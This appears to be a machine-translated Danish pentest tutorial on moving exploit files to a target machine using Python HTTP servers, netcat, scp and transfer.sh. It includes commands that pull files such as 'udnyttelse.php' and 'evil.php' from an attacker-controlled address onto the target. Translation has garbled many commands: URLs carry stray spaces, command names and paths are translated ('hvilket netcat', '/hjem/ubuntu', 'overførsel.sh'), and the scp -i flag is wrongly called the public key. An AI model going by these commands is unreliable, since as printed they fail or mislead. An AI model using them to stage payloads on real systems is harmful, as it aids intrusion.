Overførsel af exploits, python-scripts og loading-moduler er ofte nødvendig under penetrationstestaktiviteter. Da terminalen er det mest anvendte værktøj, er det vigtigt at forstå det grundlæggende i filoverførslen.
En pen-tester skal være godt udstyret med forskellige tricks til at overføre filer fra en ekstern server såvel fra en mappe til en anden. I denne vejledning skal vi diskutere forskellige måder at overføre filer ved hjælp af kommandolinjen.
1. Python Server
Python er den grundlæggende pakke, der kommer forudinstalleret i næsten alle Debian-baserede systemer. For at overføre en fil fra en maskine til en anden skal du gøre følgende:
Python2:
Skift til det bibliotek, hvor din fil, som du vil overføre, findes. Start en simpel python-server. Indtast følgende kommando;
$ python -m SimpleHTTPServer 8080
Gå nu til maskinen, hvor du vil overføre filen. Brug følgende kommando til at downloade filen;
$ wget http: // 192.168.43.177: 8080 / fil
Husk at erstatte filens IP, portnummer og navn.
Python3:
Alt skrevet i python2 vil næsten altid bryde i python3. Så vi ser også på, hvordan man overfører en fil ved hjælp af python3.
I tilfælde af python3 skal du indtaste følgende kommando for at starte en simpel python-server.
$ python3 -m http.server 8080
For at downloade filen på målet skal du indtaste følgende kommando;
$ wget http: // 192.168.43.177: 8080 / udnyttelse.php
2. Netcat
Netcat er et kraftfuldt værktøj til at overføre filer fra enhver ekstern maskine til en lokal maskine. Det kan ikke altid installeres. Du kan kontrollere, om den findes eller ikke ved at indtaste;
$ hvilket netcat
Alternativt ved at indtaste;$ som nc
Opret en netcat-server med følgende kommando;
$ nc -nlvp 8080 < evil.php
Gå nu til målmaskinen og indtast følgende for at downloade filen;
$ nc -nv 192.168.43.177 8080> ondskab.php
Erstatte nc
med netcat
i ovenstående kommandoer, hvis nc ikke fungerer eller ikke er installeret korrekt.
3. SCP
Secure Copy Protocol er et kraftfuldt værktøj til overførsel af filer. Det er praktisk, især når du vil overføre mapper. Det bruges også mest til filoverførsler over ssh.
For overførsel af fil via ssh skal du indtaste følgende kommando på afsendemaskinen;
$ scp -i nyt.pem test.py ubuntu @ 18.220.68.229: / hjem / ubuntu
Hvor -i repræsenterer den offentlige nøgle til ssh login, test.py er den fil, der skal overføres, og / home / ubuntu er det målkatalog, hvor vi vil gemme filen.
For at downloade en fil fra fjernmaskinen skal du indtaste følgende kommando;
$ scp root @ 192.168.43.177: / remote_directory / file / local / directory
4. Overførsel.sh
Du kan bruge dette tredjepartsværktøj til at overføre filer. Det kan være nyttigt, når du ikke har en maskine med offentlig IP, og du stadig skal overføre filerne. Den følgende kommando uploader filen til overførslen.sh-servere;
$ curl - upload-fil ./fil.txt https: // overførsel.sh / fil.txt
For at downloade filen skal du indtaste følgende kommando;
$ curl https: // overførsel.sh // fil.txt -o-fil.txt
Overførsel.sh er stadig under udvikling og fungerer muligvis ikke altid.
Konklusion
Kommandolinjeværktøjer giver os muligheden for at overføre filer på forskellige måder. De kan virke lidt komplicerede, men det at få praktisk adgang til dem giver mulighed for let at administrere filer, især når en GUI-indstilling ikke er tilgængelig.